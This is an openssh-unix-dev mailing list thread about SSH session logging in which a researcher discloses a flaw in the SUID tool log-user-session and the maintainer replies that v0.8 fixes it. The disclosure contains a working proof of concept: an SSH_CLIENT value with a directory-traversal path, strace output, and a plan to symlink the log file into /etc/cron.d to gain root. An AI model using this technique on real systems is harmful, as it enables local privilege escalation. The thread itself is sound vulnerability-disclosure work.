Hi Thank you for the audit. This issue has been rectified in the release v0.8. Regards Konrad On 22.11.18 15:38, halfdog wrote:
Hello, Konrad Bucheli writes:Hi, Did you check out log-user-session [1]? It can be used to record the output of ssh shell sessions in a tamper-prof way. And it is open source. ... [1] https://github.com/open-ch/log-user-sessionWell, using a SUID-binary in that way partially eliminates the benefits of tamper-proof logging by increasing the attack surface, e.g. by allowing each user to create arbitrary files using directory traversal and symlink attacks, e.g. by calling SSH_CLIENT="169.254.0.1/../../../../tmp/ 1234 22" /usr/local/bin/log-user-session 'echo "* * * * * root /usr/bin/touch /dead.txt"' to start the directory traversal and lead to the problematic open missing O_NOFOLLOW 5885 openat(AT_FDCWD, "/var/log/user-session/localhost-build-20181122-140817-169.254.0.1/../../../../tmp/-5883.log", O_WRONLY|O_CREAT|O_APPEND, 0400) = 3 Without symlink protection, linking the "-[guessable pid].log" file to "/etc/cron.d/dead" will give you root easily. Even with protection, something should be possible ... I am currently also writing a tool for a similar reason. To be really tamper-proof, my solution is preloaded into SSH to intercept the encryption master key for each session, sends it to a daemon, that will use a public key to encrypt it and offload it to another machine. Together with the full-packet-captures of all SSH connections done by the network infrastructure, I would hope for a tamper-proof but still secure solution BUT (ha, ha, ha) - it is not ready yet. Best regards, hdAm 03.11.18 um 18:08 schrieb Kaushal Shriyan:Hi, Are there any open source tools to keep track of ssh sessions? For example, if a specific user is ssh logging to remote server and what commands or scripts are being run. Basically, i need to log all users sessions. Thanks in Advance and i look forward to hearing from you. Best Regards, Kaushal _______________________________________________ openssh-unix-dev mailing list openssh-unix-dev@xxxxxxxxxxx https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev?mc_phishing_protection_id=45427-bfetfluuab2o0p3j90ng-- konrad bucheli principal systems engineer open systems ag raeffelstrasse 29 ch-8045 zurich t: +41 58 100 10 10 f: +41 58 100 10 11 kb@xxxxxxx http://www.open.ch_______________________________________________ openssh-unix-dev mailing list openssh-unix-dev@xxxxxxxxxxx https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev?mc_phishing_protection_id=45427-bfrc16muab2oqau9t3cg
-- konrad bucheli principal systems engineer open systems ag raeffelstrasse 29 ch-8045 zurich t: +41 58 100 10 10 f: +41 58 100 10 11 kb@xxxxxxx http://www.open.ch
Attachment:
smime.p7s
Description: S/MIME Cryptographic Signature
_______________________________________________ openssh-unix-dev mailing list openssh-unix-dev@xxxxxxxxxxx https://lists.mindrot.org/mailman/listinfo/openssh-unix-dev